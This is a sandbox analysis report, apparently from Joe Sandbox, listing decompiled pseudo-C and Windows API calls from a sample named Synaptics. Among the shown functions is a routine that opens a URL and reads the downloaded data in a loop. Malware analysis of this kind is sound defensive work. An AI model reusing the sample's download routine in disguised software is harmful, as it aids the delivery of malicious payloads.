                                                                                                                                                                                          0x00454bba
                                                                                                                                                                                          0x00454bae
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00454ba3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00454b44
                                                                                                                                                                                          0x00454b44
                                                                                                                                                                                          0x00454b4d
                                                                                                                                                                                          0x00454b5b
                                                                                                                                                                                          0x00454b5e
                                                                                                                                                                                          0x00454b68
                                                                                                                                                                                          0x00454b6d
                                                                                                                                                                                          0x00454b6f
                                                                                                                                                                                          0x00454b79
                                                                                                                                                                                          0x00454b85
                                                                                                                                                                                          0x00454b85
                                                                                                                                                                                          0x00454b95
                                                                                                                                                                                          0x00454b95
                                                                                                                                                                                          0x00454bdb
                                                                                                                                                                                          0x00454be2
                                                                                                                                                                                          0x00454be8
                                                                                                                                                                                          0x00454be8
                                                                                                                                                                                          0x00454bef
                                                                                                                                                                                          0x00454bf6
                                                                                                                                                                                          0x00454bf9
                                                                                                                                                                                          0x00454bfc
                                                                                                                                                                                          0x00454c09
                                                                                                                                                                                          0x00454c09
                                                                                                                                                                                          0x00454b33
                                                                                                                                                                                          0x00454b10
                                                                                                                                                                                          0x00454a68
                                                                                                                                                                                          0x00454a72
                                                                                                                                                                                          0x00454a75
                                                                                                                                                                                          0x00454a78
                                                                                                                                                                                          0x00454a7b
                                                                                                                                                                                          0x00454a7d
                                                                                                                                                                                          0x00454a7f
                                                                                                                                                                                          0x00454a8f
                                                                                                                                                                                          0x00454a93
                                                                                                                                                                                          0x00454a9f
                                                                                                                                                                                          0x00454aa4
                                                                                                                                                                                          0x00454aa7
                                                                                                                                                                                          0x00454ab4
                                                                                                                                                                                          0x00454ab9
                                                                                                                                                                                          0x00454ac8
                                                                                                                                                                                          0x00454acd
                                                                                                                                                                                          0x00454acd
                                                                                                                                                                                          0x00454a9f
                                                                                                                                                                                          0x00454ad2
                                                                                                                                                                                          0x00454ad3
                                                                                                                                                                                          0x00454ad3
                                                                                                                                                                                          0x00454ad3
                                                                                                                                                                                          0x00454a7d

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetMenu.USER32(00000000), ref: 00454B68
                                                                                                                                                                                          • SetMenu.USER32(00000000,00000000), ref: 00454B85
                                                                                                                                                                                          • SetMenu.USER32(00000000,00000000), ref: 00454BBA
                                                                                                                                                                                          • SetMenu.USER32(00000000,00000000,00000000,00454C0A), ref: 00454BD6
                                                                                                                                                                                            • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Menu$LoadString
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3688185913-0
                                                                                                                                                                                          • Opcode ID: 9ef444e933b09877c328c4c92fa3845e43b2cad6075fb8db61f2460728ee00b7
                                                                                                                                                                                          • Instruction ID: 8074770e88abfcf8b34beed0e108b3c66a7315ec12ddf3ed763e984ff9a80418
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ef444e933b09877c328c4c92fa3845e43b2cad6075fb8db61f2460728ee00b7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 21518130A043445ADB61EF6A888575A7AA4AB8430DF0545BBEC059F3A3CA7CEC89875D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00474D50 Relevance: 6.1, APIs: 4, Instructions: 90networkfileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                          			E00474D50(void* __eax, void* __ebx, intOrPtr __edx, void* __esi) {
				intOrPtr _v8;
				char _v9;
				void* _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				void _v1060;
				char _v1392;
				char _v1856;
				void* _t32;
				void* _t37;
				void* _t48;
				int _t55;
				DWORD* _t57;
				intOrPtr _t68;
				void* _t70;
				void* _t72;
				void* _t73;
				intOrPtr _t74;

				_t72 = _t73;
				_t74 = _t73 + 0xfffff8c4;
				_v1856 = 0;
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v8 = __edx;
				_t70 = __eax;
				_t57 =  &_v24;
				_push(_t72);
				_push(0x474f77);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				E00402B68(0,  &_v1856);
				E00409E18(_v1856,  &_v28);
				_t32 = InternetOpenA(E00404E80(_v28), 0, 0, 0, 0); // executed
				_v16 = _t32;
				_push(_t72);
				_push(0x474e92);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				_t37 = InternetOpenUrlA(_v16, E00404E80(_t70), 0, 0, 0x84000000, 0); // executed
				_v20 = _t37;
				_push(_t72);
				_push(0x474e74);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				E00402F1C( &_v1392, _v8, 0);
				E004028C4(E004035E4());
				do {
					InternetReadFile(_v20,  &_v1060, 0x400, _t57); // executed
					_t48 = E0040306C(0); // executed
					E004028C4(_t48); // executed
				} while ( *_t57 != 0);
				E004028C4(E0040308C( &_v1392));
				_v9 = 1;
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(E00474E7B);
				_t55 = InternetCloseHandle(_v20); // executed
				return _t55;
			}
























                                                                                                                                                                                          0x00474d51
                                                                                                                                                                                          0x00474d53
                                                                                                                                                                                          0x00474d5d
                                                                                                                                                                                          0x00474d63
                                                                                                                                                                                          0x00474d66
                                                                                                                                                                                          0x00474d69
                                                                                                                                                                                          0x00474d6c
                                                                                                                                                                                          0x00474d6f
                                                                                                                                                                                          0x00474d71
                                                                                                                                                                                          0x00474d76
                                                                                                                                                                                          0x00474d77
                                                                                                                                                                                          0x00474d7c
                                                                                                                                                                                          0x00474d7f
                                                                                                                                                                                          0x00474d8a
                                                                                                                                                                                          0x00474d98
                                                                                                                                                                                          0x00474dae
                                                                                                                                                                                          0x00474db3
                                                                                                                                                                                          0x00474db8
                                                                                                                                                                                          0x00474db9
                                                                                                                                                                                          0x00474dbe
                                                                                                                                                                                          0x00474dc1
                                                                                                                                                                                          0x00474ddb
                                                                                                                                                                                          0x00474de0
                                                                                                                                                                                          0x00474de5
                                                                                                                                                                                          0x00474de6
                                                                                                                                                                                          0x00474deb
                                                                                                                                                                                          0x00474dee
                                                                                                                                                                                          0x00474dfa
                                                                                                                                                                                          0x00474e0f
                                                                                                                                                                                          0x00474e14
                                                                                                                                                                                          0x00474e25
                                                                                                                                                                                          0x00474e3a
                                                                                                                                                                                          0x00474e3f
                                                                                                                                                                                          0x00474e44
                                                                                                                                                                                          0x00474e54
                                                                                                                                                                                          0x00474e59
                                                                                                                                                                                          0x00474e5f
                                                                                                                                                                                          0x00474e62
                                                                                                                                                                                          0x00474e65
                                                                                                                                                                                          0x00474e6e
                                                                                                                                                                                          0x00474e73

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00402B68: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 00402B8C
                                                                                                                                                                                          • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00474DAE
                                                                                                                                                                                          • InternetOpenUrlA.WININET(00000001,00000000,00000000,00000000,84000000,00000000), ref: 00474DDB
                                                                                                                                                                                          • InternetReadFile.WININET(?,?,00000400,?), ref: 00474E25
                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00474E6E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Internet$FileOpen$CloseHandleModuleNameRead
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1785656124-0
                                                                                                                                                                                          • Opcode ID: 5377a35a2357c920819ba0a7cac0c8aa84866f652442d448259169106c5d7395
                                                                                                                                                                                          • Instruction ID: 9dd8df19d1045a063bc6dcad90270211b168fb7c8f28217f7d4554014ce166d6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5377a35a2357c920819ba0a7cac0c8aa84866f652442d448259169106c5d7395
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D318670A00218ABDB11DFA5DC52BAEB7B8EB48704F91447AF504B72C1D7786A00CF68
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041E198 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                          			E0041E198(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
				CHAR* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t12;
				void* _t18;
				void* _t23;
				CHAR* _t24;
				void* _t25;
				struct HRSRC__* _t29;
				void* _t30;
				struct HINSTANCE__* _t31;
				void* _t32;

				_v8 = _t24;
				_t31 = __edx;
				_t23 = __eax;
				_t12 = FindResourceA(__edx, _v8, _a4); // executed
				_t29 = _t12;
				 *(_t23 + 0x10) = _t29;
				_t33 = _t29;
				if(_t29 == 0) {
					E0041E128(_t23, _t24, _t29, _t31, _t33, _t32);
					_pop(_t24);
				}
				_t5 = _t23 + 0x10; // 0x41e23c
				_t30 = LoadResource(_t31,  *_t5);
				 *(_t23 + 0x14) = _t30;
				_t34 = _t30;
				if(_t30 == 0) {
					E0041E128(_t23, _t24, _t30, _t31, _t34, _t32);
				}
				_t7 = _t23 + 0x10; // 0x41e23c
				_push(SizeofResource(_t31,  *_t7));
				_t8 = _t23 + 0x14; // 0x41dd60
				_t18 = LockResource( *_t8);
				_pop(_t25);
				return E0041DD20(_t23, _t25, _t18);
			}


















                                                                                                                                                                                          0x0041e19f
                                                                                                                                                                                          0x0041e1a2
                                                                                                                                                                                          0x0041e1a4
                                                                                                                                                                                          0x0041e1af
                                                                                                                                                                                          0x0041e1b4
                                                                                                                                                                                          0x0041e1b6
                                                                                                                                                                                          0x0041e1b9
                                                                                                                                                                                          0x0041e1bb
                                                                                                                                                                                          0x0041e1be
                                                                                                                                                                                          0x0041e1c3
                                                                                                                                                                                          0x0041e1c3
                                                                                                                                                                                          0x0041e1c4
                                                                                                                                                                                          0x0041e1ce
                                                                                                                                                                                          0x0041e1d0
                                                                                                                                                                                          0x0041e1d3
                                                                                                                                                                                          0x0041e1d5
                                                                                                                                                                                          0x0041e1d8
                                                                                                                                                                                          0x0041e1dd
                                                                                                                                                                                          0x0041e1de
                                                                                                                                                                                          0x0041e1e8
                                                                                                                                                                                          0x0041e1e9
                                                                                                                                                                                          0x0041e1ed
                                                                                                                                                                                          0x0041e1f6
                                                                                                                                                                                          0x0041e201

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindResourceA.KERNEL32(00400000,?,?), ref: 0041E1AF
                                                                                                                                                                                          • LoadResource.KERNEL32(00400000,0041E23C,00419048,00400000,00000001,00000000,?,0041E108,?,00000000,?,00000000,?,004767C5,0000000A,KBHKS), ref: 0041E1C9
                                                                                                                                                                                          • SizeofResource.KERNEL32(00400000,0041E23C,00400000,0041E23C,00419048,00400000,00000001,00000000,?,0041E108,?,00000000,?,00000000,?,004767C5), ref: 0041E1E3
                                                                                                                                                                                          • LockResource.KERNEL32(0041DD60,00000000,00400000,0041E23C,00400000,0041E23C,00419048,00400000,00000001,00000000,?,0041E108,?,00000000,?,00000000), ref: 0041E1ED
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3473537107-0
                                                                                                                                                                                          • Opcode ID: 9422232bda4f755a2221c3238b95ec70872abee181a7fbf85ff6cd90fcdaa231
                                                                                                                                                                                          • Instruction ID: 0493972d3240682b7dd301822f78e45fd4f377a97d2dc7c1e7558ac95a832863
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9422232bda4f755a2221c3238b95ec70872abee181a7fbf85ff6cd90fcdaa231
                                                                                                                                                                                          • Instruction Fuzzy Hash: ECF04BB6A042047F9704EE5AAC81DAB77DCEE88364320006EFD08DB342DA38ED4143B9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0047847C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                          			E0047847C(intOrPtr* __eax, void* __ebx, intOrPtr* __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0, signed int _a4, signed int* _a8) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _v20;
				signed int* _v24;
				signed int* _v28;
				signed int _v32;
				signed int* _v36;
				intOrPtr _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v52;
				char _v84;
				signed int _v1620;
				signed int _t142;
				intOrPtr _t143;
				intOrPtr* _t144;
				intOrPtr _t147;
				signed char _t157;
				signed char _t158;
				signed int* _t165;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t224;
				intOrPtr _t225;
				intOrPtr _t226;
				intOrPtr _t227;
				signed int _t256;
				intOrPtr* _t258;
				void* _t260;
				void* _t261;
				intOrPtr _t262;
				void* _t276;

				_t276 = __fp0;
				_t260 = _t261;
				_t262 = _t261 + 0xfffff9b0;
				_v12 = __ecx;
				_t258 = __edx;
				_v8 = __eax;
				_t224 =  *0x417dc0; // 0x417dc4
				E004053AC( &_v84, _t224);
				_push(_t260);
				_push(0x4787af);
				_push( *[fs:eax]);
				 *[fs:eax] = _t262;
				_v20 = 0;
				_t211 = 0;
				_push(_t260);
				_push(0x47878c);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t262;
				_t256 =  *(__edx + 1) & 0x000000ff;
				if(_t256 > 0x40) {
					_t211 =  *0x49d980; // 0x477e3c
					E0040D200(_t211, 1);
					E00404378();
				}
				if(_t256 == 0) {
					L25:
					_v52 =  &_v1620;
					_v48 = _v12 + 4;
					_v44 = _t256;
					_v40 = 0;
					_t225 =  *_v12;
					_t142 =  *_t258;
					if(0 != 4) {
						__eflags = 0 - 1;
						if(0 == 1) {
							__eflags = _t256;
							if(__eflags == 0) {
								__eflags = _a4;
								if(__eflags != 0) {
									_t142 = 3;
								}
							}
						}
					} else {
						if((_v1620 & 0x00000fff) == 9) {
							_t142 = 8;
						}
						 *_v12 = 0xfffffffd;
						_v48 = _v48 - 4;
						_v40 = _v40 + 1;
					}
					_push(0);
					_push( &_v84);
					_push(_a4);
					_push( &_v52);
					_push(_t142);
					_push(0);
					_t143 =  *0x49d770; // 0x49b500
					_push(_t143);
					_push(_t225);
					_t144 = _v8;
					_push(_t144);
					if( *((intOrPtr*)( *_t144 + 0x18))() != 0) {
						E00478A5C();
					}
					_t207 = _v20;
					if(_t207 == 0) {
						L39:
						_t147 = 0;
						_pop(_t226);
						 *[fs:eax] = _t226;
						_push(E00478793);
						_t208 = _v20;
						if(_t208 == 0) {
							L41:
							return _t147;
						} else {
							goto L40;
						}
						do {
							L40:
							_t208 = _t208 - 1;
							_t147 =  *((intOrPtr*)(_t260 + _t208 * 8 - 0x250));
							_push(_t147);
							L00417E14();
						} while (_t208 != 0);
						goto L41;
					} else {
						do {
							_t207 = _t207 - 1;
							_t148 = _t260 + _t207 * 8 - 0x250;
							_t227 =  *((intOrPtr*)(_t260 + _t207 * 8 - 0x250 + 4));
							_t272 = _t227;
							if(_t227 != 0) {
								E00405950( *_t148,  *_t148, _t227, _t272);
							}
						} while (_t207 != 0);
						goto L39;
					}
				} else {
					_v24 = _a8;
					_v28 = _t260 + (_t256 + _t256) * 8 - 0x650;
					_t209 = 0;
					do {
						_v28 = _v28 - 0x10;
						_t157 =  *((intOrPtr*)(_t258 + _t209 + 3));
						_v16 = _t157 & 0x7f;
						_t158 = _t157 & 0x00000080;
						if(_v16 != 0xa) {
							__eflags = _v16 - 0x48;
							if(_v16 != 0x48) {
								__eflags = _t158;
								if(_t158 == 0) {
									__eflags = _v16 - 0xc;
									if(_v16 != 0xc) {
										 *_v28 = _v16;
										_v28[2] =  *_v24;
										__eflags = _v16 - 5;
										if(_v16 >= 5) {
											__eflags = _v16 - 7;
											if(_v16 <= 7) {
												_t93 =  &_v24;
												 *_t93 =  &(_v24[1]);
												__eflags =  *_t93;
												_v28[3] =  *_v24;
											}
										}
									} else {
										__eflags =  *_v24 - 0x100;
										if( *_v24 != 0x100) {
											_t165 = _v24;
											 *_v28 =  *_t165;
											_v28[1] = _t165[1];
											_t211 = _v28;
											_v28[2] = _t165[2];
											_v28[3] = _t165[3];
											_v24 =  &(_v24[3]);
										} else {
											_v36 = _t260 + _v20 * 8 - 0x250;
											 *_v36 = E00405974(_v24[2], _t211);
											_v36[1] = 0;
											 *_v28 = 8;
											_v28[2] =  *_v36;
											_v20 = _v20 + 1;
										}
									}
									goto L23;
								}
								__eflags = _v16 - 0xc;
								if(_v16 == 0xc) {
									__eflags =  *( *_v24) - 0x100;
									if( *( *_v24) == 0x100) {
										_t211 = 8;
										E00411330( *_v24, 8,  *_v24, _t256, _t276);
									}
								}
								 *_v28 = _v16 | 0x00004000;
								_v28[2] =  *_v24;
								goto L23;
							} else {
								_v32 = _t260 + _v20 * 8 - 0x250;
								__eflags = _t158;
								if(_t158 == 0) {
									 *_v32 = E00405974( *_v24, _t211);
									__eflags = 0;
									 *(_v32 + 4) = 0;
									 *_v28 = 8;
									_v28[2] =  *_v32;
								} else {
									 *_v32 = E00405974( *( *_v24), _t211);
									 *(_v32 + 4) =  *_v24;
									 *_v28 = 0x4008;
									_v28[2] = _v32;
								}
								_v20 = _v20 + 1;
								L23:
								_t98 =  &_v24;
								 *_t98 =  &(_v24[1]);
								__eflags =  *_t98;
								goto L24;
							}
						} else {
							 *_v28 = 0xa;
							_v28[2] = 0x80020004;
						}
						L24:
						_t209 = _t209 + 1;
					} while (_t256 != _t209);
					goto L25;
				}
			}





































                                                                                                                                                                                          0x0047847c
                                                                                                                                                                                          0x0047847d
                                                                                                                                                                                          0x0047847f
                                                                                                                                                                                          0x00478488
                                                                                                                                                                                          0x0047848b
                                                                                                                                                                                          0x0047848d
                                                                                                                                                                                          0x00478493
                                                                                                                                                                                          0x00478499
                                                                                                                                                                                          0x004784a0
                                                                                                                                                                                          0x004784a1
                                                                                                                                                                                          0x004784a6
                                                                                                                                                                                          0x004784a9
                                                                                                                                                                                          0x004784ae
                                                                                                                                                                                          0x004784b1
                                                                                                                                                                                          0x004784b3
                                                                                                                                                                                          0x004784b4
                                                                                                                                                                                          0x004784b9
                                                                                                                                                                                          0x004784bc
                                                                                                                                                                                          0x004784bf
                                                                                                                                                                                          0x004784c6
                                                                                                                                                                                          0x004784c8
                                                                                                                                                                                          0x004784d5
                                                                                                                                                                                          0x004784da
                                                                                                                                                                                          0x004784da
                                                                                                                                                                                          0x004784e1
                                                                                                                                                                                          0x004786aa
                                                                                                                                                                                          0x004786b0
                                                                                                                                                                                          0x004786b9
                                                                                                                                                                                          0x004786bc
                                                                                                                                                                                          0x004786c4
                                                                                                                                                                                          0x004786ca
                                                                                                                                                                                          0x004786ce
                                                                                                                                                                                          0x004786d3
                                                                                                                                                                                          0x004786fd
                                                                                                                                                                                          0x00478700
                                                                                                                                                                                          0x00478702
                                                                                                                                                                                          0x00478704
                                                                                                                                                                                          0x00478706
                                                                                                                                                                                          0x0047870a
                                                                                                                                                                                          0x0047870c
                                                                                                                                                                                          0x0047870c
                                                                                                                                                                                          0x0047870a
                                                                                                                                                                                          0x00478704
                                                                                                                                                                                          0x004786d5
                                                                                                                                                                                          0x004786e4
                                                                                                                                                                                          0x004786e6
                                                                                                                                                                                          0x004786e6
                                                                                                                                                                                          0x004786ee
                                                                                                                                                                                          0x004786f4
                                                                                                                                                                                          0x004786f8
                                                                                                                                                                                          0x004786f8
                                                                                                                                                                                          0x00478711
                                                                                                                                                                                          0x00478716
                                                                                                                                                                                          0x0047871a
                                                                                                                                                                                          0x0047871e
                                                                                                                                                                                          0x0047871f
                                                                                                                                                                                          0x00478720
                                                                                                                                                                                          0x00478722
                                                                                                                                                                                          0x00478727
                                                                                                                                                                                          0x00478728
                                                                                                                                                                                          0x00478729
                                                                                                                                                                                          0x0047872c
                                                                                                                                                                                          0x00478734
                                                                                                                                                                                          0x00478739
                                                                                                                                                                                          0x00478739
                                                                                                                                                                                          0x0047873e
                                                                                                                                                                                          0x00478743
                                                                                                                                                                                          0x00478765
                                                                                                                                                                                          0x00478765
                                                                                                                                                                                          0x00478767
                                                                                                                                                                                          0x0047876a
                                                                                                                                                                                          0x0047876d
                                                                                                                                                                                          0x00478772
                                                                                                                                                                                          0x00478777
                                                                                                                                                                                          0x0047878b
                                                                                                                                                                                          0x0047878b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00478779
                                                                                                                                                                                          0x00478779
                                                                                                                                                                                          0x00478779
                                                                                                                                                                                          0x0047877a
                                                                                                                                                                                          0x00478781
                                                                                                                                                                                          0x00478782
                                                                                                                                                                                          0x00478787
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00478745
                                                                                                                                                                                          0x00478745
                                                                                                                                                                                          0x00478745
                                                                                                                                                                                          0x00478746
                                                                                                                                                                                          0x0047874d
                                                                                                                                                                                          0x00478750
                                                                                                                                                                                          0x00478752
                                                                                                                                                                                          0x0047875c
                                                                                                                                                                                          0x0047875c
                                                                                                                                                                                          0x00478761
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00478745
                                                                                                                                                                                          0x004784e7
                                                                                                                                                                                          0x004784ea
                                                                                                                                                                                          0x004784f8
                                                                                                                                                                                          0x004784fb
                                                                                                                                                                                          0x004784fd
                                                                                                                                                                                          0x004784fd
                                                                                                                                                                                          0x00478501
                                                                                                                                                                                          0x00478510
                                                                                                                                                                                          0x00478513
                                                                                                                                                                                          0x00478519
                                                                                                                                                                                          0x00478533
                                                                                                                                                                                          0x00478537
                                                                                                                                                                                          0x004785ad
                                                                                                                                                                                          0x004785af
                                                                                                                                                                                          0x004785f6
                                                                                                                                                                                          0x004785fa
                                                                                                                                                                                          0x00478675
                                                                                                                                                                                          0x0047867f
                                                                                                                                                                                          0x00478682
                                                                                                                                                                                          0x00478686
                                                                                                                                                                                          0x00478688
                                                                                                                                                                                          0x0047868c
                                                                                                                                                                                          0x0047868e
                                                                                                                                                                                          0x0047868e
                                                                                                                                                                                          0x0047868e
                                                                                                                                                                                          0x0047869a
                                                                                                                                                                                          0x0047869a
                                                                                                                                                                                          0x0047868c
                                                                                                                                                                                          0x004785fc
                                                                                                                                                                                          0x004785ff
                                                                                                                                                                                          0x00478604
                                                                                                                                                                                          0x00478644
                                                                                                                                                                                          0x0047864c
                                                                                                                                                                                          0x00478654
                                                                                                                                                                                          0x0047865a
                                                                                                                                                                                          0x0047865d
                                                                                                                                                                                          0x00478666
                                                                                                                                                                                          0x00478669
                                                                                                                                                                                          0x00478606
                                                                                                                                                                                          0x00478610
                                                                                                                                                                                          0x00478621
                                                                                                                                                                                          0x00478628
                                                                                                                                                                                          0x0047862e
                                                                                                                                                                                          0x0047863c
                                                                                                                                                                                          0x0047863f
                                                                                                                                                                                          0x0047863f
                                                                                                                                                                                          0x00478604
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004785fa
                                                                                                                                                                                          0x004785b1
                                                                                                                                                                                          0x004785b5
                                                                                                                                                                                          0x004785bc
                                                                                                                                                                                          0x004785c1
                                                                                                                                                                                          0x004785cf
                                                                                                                                                                                          0x004785d4
                                                                                                                                                                                          0x004785d4
                                                                                                                                                                                          0x004785c1
                                                                                                                                                                                          0x004785e4
                                                                                                                                                                                          0x004785ee
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00478539
                                                                                                                                                                                          0x00478543
                                                                                                                                                                                          0x00478546
                                                                                                                                                                                          0x00478548
                                                                                                                                                                                          0x00478587
                                                                                                                                                                                          0x0047858c
                                                                                                                                                                                          0x0047858e
                                                                                                                                                                                          0x00478594
                                                                                                                                                                                          0x004785a2
                                                                                                                                                                                          0x0047854a
                                                                                                                                                                                          0x00478559
                                                                                                                                                                                          0x00478563
                                                                                                                                                                                          0x00478569
                                                                                                                                                                                          0x00478575
                                                                                                                                                                                          0x00478575
                                                                                                                                                                                          0x004785a5
                                                                                                                                                                                          0x0047869d
                                                                                                                                                                                          0x0047869d
                                                                                                                                                                                          0x0047869d
                                                                                                                                                                                          0x0047869d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0047869d
                                                                                                                                                                                          0x0047851b
                                                                                                                                                                                          0x0047851e
                                                                                                                                                                                          0x00478527
                                                                                                                                                                                          0x00478527
                                                                                                                                                                                          0x004786a1
                                                                                                                                                                                          0x004786a1
                                                                                                                                                                                          0x004786a2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004784fd

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00478782
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeString
                                                                                                                                                                                          • String ID: <~G$H
                                                                                                                                                                                          • API String ID: 3341692771-3576284788
                                                                                                                                                                                          • Opcode ID: abb6cc486b40284b4fe571549fcb5a3b13e9f6fa694418c3db2e4b804864b1a7
                                                                                                                                                                                          • Instruction ID: b8f1c08bed6d2714fac9d526e07dd471d665f945914cf58d975e5e29605529f8
                                                                                                                                                                                          • Opcode Fuzzy Hash: abb6cc486b40284b4fe571549fcb5a3b13e9f6fa694418c3db2e4b804864b1a7
                                                                                                                                                                                          • Instruction Fuzzy Hash: E7B1F8B4A006099FDB14CF99C884AAEB7F1FF49314F20C56AE909AB351D738AD41CF64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402188 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00401A9C: RtlInitializeCriticalSection.KERNEL32(0049E5CC,00000000,',?,?,00402336,022E0208,3A6E6967,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AB2
                                                                                                                                                                                            • Part of subcall function 00401A9C: RtlEnterCriticalSection.KERNEL32(0049E5CC,0049E5CC,00000000,',?,?,00402336,022E0208,3A6E6967,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AC5
                                                                                                                                                                                            • Part of subcall function 00401A9C: LocalAlloc.KERNEL32(00000000,00000FF8,0049E5CC,00000000,',?,?,00402336,022E0208,3A6E6967,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AEF
